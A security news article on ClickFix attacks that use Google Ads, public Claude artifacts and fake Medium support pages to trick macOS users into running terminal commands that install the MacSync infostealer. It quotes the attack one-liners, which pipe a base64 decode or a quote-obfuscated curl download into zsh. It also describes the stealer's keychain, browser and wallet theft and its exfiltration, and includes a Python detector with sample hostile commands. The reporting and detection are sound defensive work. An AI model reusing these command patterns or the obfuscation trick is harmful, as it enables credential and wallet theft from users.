New ClickFix macOS Attacks Exploit Claude Artifacts and Google Ads to Deliver MacSync Infostealer

CyberSecureFox 🦊

Security researchers have identified a new wave of ClickFix attacks targeting macOS, in which threat actors combine paid Google Ads with public Claude artifacts from Anthropic to distribute the MacSync infostealer. In one case tracked by Moonlock Lab, a single malicious Claude artifact attracted more than 15,600 views, underscoring the scale and reach of the campaign.

ClickFix attacks: persuading users to compromise their own macOS systems

ClickFix is a class of social-engineering attack where victims are coaxed into manually running commands in a console under the pretext of “fixing” or “diagnosing” a problem. Instead of silently dropping malware, the attacker convinces the user to copy and paste a command into the terminal or command line, effectively bypassing many built‑in defenses.

On Windows, ClickFix has typically involved bogus PowerShell commands advertised as ways to repair browser issues, overcome display glitches, or pass a “security verification.” Adversaries frequently simulate BSOD screens, slow down the browser artificially, or present fake CAPTCHAs, then provide a command that supposedly resolves the issue.

Although such activity has historically focused on Windows users, researchers have repeatedly observed ClickFix-style techniques adapted for macOS and Linux. The latest campaign confirms a clear trend: Apple’s ecosystem is now treated as a lucrative target, and attackers are investing in macOS‑specific social engineering.

Abusing Claude artifacts, Medium, and Google Ads in macOS malvertising

Claude artifacts are public objects—such as guides, code snippets, and notes—generated with Anthropic’s LLM and hosted on the claude.ai domain. Although the platform labels them as user-generated and not moderated, many users implicitly trust them more than random blogs because they reside on a well-known AI provider’s domain.

According to Moonlock Lab and AdGuard, threat actors are buying Google search ads for queries like “online DNS resolver,” “macOS CLI disk space analyzer,” “Homebrew,” and other technical keywords. The ad appears at the top of search results, looking highly relevant and legitimate.

Clicking the ad sends users either to a malicious Claude artifact with a “step-by-step” troubleshooting guide or to a fake “Apple support” article hosted on Medium. In both cases, the content is crafted to persuade the victim to copy a terminal command and execute it on macOS as part of the supposed fix.

Malicious macOS terminal commands delivering the MacSync infostealer

Researchers highlight two primary malicious command patterns used in this campaign. The first takes the form:

echo "…" | base64 -D | zsh

Victims are told this is a harmless “service” or “diagnostic” command. In reality, the base64-encoded payload is decoded and piped directly into the default macOS shell zsh, which then executes a loader script.

The second variant looks like this:

true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh

Here the standard macOS utility curl is invoked (with the command name obfuscated as cur""l to evade simple filters) to download a remote script and immediately pipe it into zsh for execution. Both approaches ultimately fetch and run a loader for the MacSync malware, an information stealer focused on sensitive data theft.
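Detection logic for the two command shapes described above, written as an added example rather than code from the article or from the researchers' tooling: it normalizes the empty-quote obfuscation (cur""l becomes curl) and flags any base64 decode or curl download that is piped straight into a shell. The sample command lines, the example.invalid domain and the PLACEHOLDER hash are constructed for the demonstration.

```python
import re

# Shell interpreters a ClickFix one-liner pipes its payload into.
SHELLS = r"(?:zsh|bash|sh)"

# Constructed sample command lines, as an EDR or process-audit source
# might record them. Domain and hash are placeholders, not real indicators.
SAMPLE_COMMANDS = [
    'echo "aGVsbG8=" | base64 -D | zsh',
    'true && cur""l -SsLfk --compressed "https://example.invalid/curl/PLACEHOLDER" | zsh',
    "curl -fsSL https://example.invalid/install.sh | bash",
    "ls -la /tmp",
    "base64 -D -i notes.b64 -o notes.txt",
]


def normalize(cmd: str) -> str:
    """Strip empty quote pairs used to split a command name (cur""l -> curl)."""
    return re.sub(r'(?:""|\'\')', "", cmd)


def classify(cmd: str) -> list:
    """Return the ClickFix indicators found in one command line (empty if clean)."""
    norm = normalize(cmd)
    hits = []
    if cmd != norm:
        hits.append("quote-obfuscated token")
    # Pattern 1: decoded base64 blob piped into a shell (-D is the macOS flag).
    if re.search(rf"base64\s+(?:-D|-d|--decode)\b.*\|\s*{SHELLS}\b", norm):
        hits.append("base64 decode piped to shell")
    # Pattern 2: remote script fetched with curl and piped into a shell.
    if re.search(rf"\bcurl\b.*\|\s*{SHELLS}\b", norm):
        hits.append("curl download piped to shell")
    return hits


def scan(commands):
    """Map each suspicious command line to the indicators it triggered."""
    return {c: classify(c) for c in commands if classify(c)}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMANDS).items():
        print(f"{cmd}\n    -> {', '.join(hits)}")
```

The plain curl-to-bash hit is a triage signal rather than proof of compromise, since some legitimate installers use the same shape; the obfuscated-token indicator is the stronger one.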

MacSync behavior: keychain, browser, and crypto wallet theft on macOS

Once running, MacSync contacts its command‑and‑control (C2) server using a hard‑coded token and API key. To blend into normal traffic, it spoofs the User-Agent string to resemble legitimate macOS browser activity, complicating detection at the network layer.

The response from the C2 server is fed directly to osascript, which executes AppleScript commands. This AppleScript logic performs the actual data theft, targeting items such as the macOS keychain, stored browser passwords and cookies, and data from cryptocurrency wallets and other sensitive applications.

Collected information is compressed into /tmp/osalogging.zip and exfiltrated to a2abotnet[.]com/gate via HTTP POST. If the upload fails, MacSync splits the archive into chunks and attempts to resend it up to eight times. After successful exfiltration, the malware cleans up its artifacts to reduce forensic visibility and hinder incident response.

Links to previous macOS malware campaigns and emerging LLM abuse trends

The infrastructure and techniques used in this operation overlap with earlier distribution of the AMOS infostealer, another macOS‑focused threat. In December 2025, security teams observed similar ClickFix campaigns where paid ads pushed seemingly helpful chat sessions with ChatGPT and Grok that ultimately led to malicious commands.

This latest activity leveraging Claude artifacts fits into a broader pattern: attackers are systematically exploiting LLM platforms and user‑generated content as new delivery channels. Combined with paid search advertising, these campaigns take advantage of brand trust in Apple, Google, and popular AI tools to increase the likelihood of compromise—especially among users who still consider macOS “secure by default.”

To mitigate the risk of ClickFix-style attacks on macOS, users should treat any instructions that ask them to run terminal commands—particularly those reached via ads, random blogs, LLM artifacts, or unofficial guides—with strong skepticism. Commands should be verified against trusted sources such as official vendor documentation, reputable developer repositories, or well-known support portals. Keeping macOS fully updated, maintaining Gatekeeper and built‑in protections, and deploying reputable endpoint security tools are equally important. For organizations, combining these technical controls with regular security awareness training on AI tools, malvertising, and console usage is now critical to stopping such campaigns before the first command is ever typed.
